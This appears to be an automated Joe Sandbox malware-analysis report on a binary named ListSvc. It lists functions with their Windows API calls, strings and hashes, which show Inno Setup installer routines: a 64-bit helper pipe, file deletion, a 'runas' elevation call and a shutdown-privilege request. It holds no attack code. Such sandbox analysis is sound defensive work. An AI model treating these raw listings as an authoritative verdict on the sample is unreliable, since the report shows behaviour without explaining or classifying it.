Opcode Fuzzy Hash: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265

Strings

\, xrefs: 0040E232
GetLongPathNameW, xrefs: 0040E0FC
kernel32.dll, xrefs: 0040E0EC

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89

Uniqueness

Uniqueness Score: -1.00%

Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744

Strings

SeShutdownPrivilege, xrefs: 0060F700

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B

Uniqueness

Uniqueness Score: -1.00%

Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 006A6913
GetWindowLongW.USER32(?,000000F0), ref: 006A6930
GetWindowLongW.USER32(?,000000EC), ref: 006A6955

Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29

GetActiveWindow.USER32 ref: 006A6A34
SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,?,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87

Strings

`, xrefs: 006A68E9

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$ActiveLong$EnableIconic
String ID: `
API String ID: 4222481217-2679148245
Opcode ID: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
Opcode Fuzzy Hash: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE

Strings

isRS-, xrefs: 006B8E55
isRS-???.tmp, xrefs: 006B8E1D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
Opcode Fuzzy Hash: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 005C90F9
GetWindowLongW.USER32(?,000000F0), ref: 005C9116
GetWindowLongW.USER32(?,000000EC), ref: 005C913B
GetActiveWindow.USER32 ref: 005C9149
MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
Opcode Fuzzy Hash: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006257BC
QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CreateProcessW.KERNEL32 ref: 00625986
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

CreateProcess, xrefs: 0062598F
SetNamedPipeHandleState, xrefs: 006258E6
Helper process PID: %u, xrefs: 006259D9
64-bit helper EXE wasn't extracted, xrefs: 006257B0
CreateNamedPipe, xrefs: 0062586C
i, xrefs: 00625939
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00625824
helper %d 0x%x, xrefs: 00625965
Cannot utilize 64-bit features on this version of Windows, xrefs: 0062579D
CreateFile, xrefs: 006258B2
Starting 64-bit helper process., xrefs: 00625789
D, xrefs: 006258FF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65

Uniqueness

Uniqueness Score: -1.00%

Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
MsgWaitForMultipleObjects.USER32 ref: 006B9206
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

/REG, xrefs: 006B916E
Inno-Setup-RegSvr-Mutex, xrefs: 006B91C9
.lst, xrefs: 006B9258
<`m, xrefs: 006B927E
.msg, xrefs: 006B923E
(\m, xrefs: 006B928F
Setup, xrefs: 006B91AA
/REGU, xrefs: 006B9192

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ShowWindow$FileModuleMultipleNameObjectsWait
String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 66301061-906243933
Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00629850, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 214COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00629B12,?,?,?,?,00000005,00000000,00000000,?,?,0062AF86,00000000,00000000,?,00000000), ref: 006299C6

Strings

.chm, xrefs: 006298F2
.gid, xrefs: 006298A6
Failed to delete the file; it may be in use (%d)., xrefs: 00629AA9
Failed to strip read-only attribute., xrefs: 006299AB
The file appears to be in use (%d). Will delete on restart., xrefs: 00629A0F
Stripped read-only attribute., xrefs: 0062999F
.fts, xrefs: 006298CA
.hlp, xrefs: 0062988D
Deleting file: %s, xrefs: 00629963
.chw, xrefs: 0062990B
.lnk, xrefs: 00629931

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: 5d73a085ff41ed3d0e7db0f3accd41715629631834765465fc96abbc7898b2f5
Instruction ID: 80e8b6ab9e5d3a552657306fa088f7fa642ecff14c11c84625059ee943e1d250
Opcode Fuzzy Hash: 5d73a085ff41ed3d0e7db0f3accd41715629631834765465fc96abbc7898b2f5
Instruction Fuzzy Hash: D371E330B00B245FDB04EF68E851BEE77A6AF89710F14842DF801A7381DAB89D45CB79

Uniqueness

Uniqueness Score: -1.00%

Function 0060E4D8, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E77A,?,?,00000003,00000000,00000000,0060E7BE), ref: 0060E5F9

Part of subcall function 005C857C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E67A
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E6A1

Strings

RegOpenKeyEx, xrefs: 0060E573
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E54E
, xrefs: 0060E56A
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E515

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
Instruction ID: f3c5cbb3acae1969306396449b745ae43344fa58bfe099d55e14c7ecbf00227c
Opcode Fuzzy Hash: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
Instruction Fuzzy Hash: C7919270E84219AFDB04DFA5D885BEFBBBAEB48304F14482AF500E72C1D7769945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91

Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043

ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
GetLastError.KERNEL32(0000003C,00000000,006A6237,?,?,00000001), ref: 006A6178
MsgWaitForMultipleObjects.USER32 ref: 006A61C5
GetExitCodeProcess.KERNEL32 ref: 006A61EB
CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,0000003C,00000000,006A6237,?,?,00000001), ref: 006A620F

Strings

<, xrefs: 006A612E
ShellExecuteEx returned hProcess=0, xrefs: 006A6199
GetExitCodeProcess, xrefs: 006A61F4
ShellExecuteEx, xrefs: 006A6189
runas, xrefs: 006A613C
MsgWaitForMultipleObjects, xrefs: 006A61D4

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
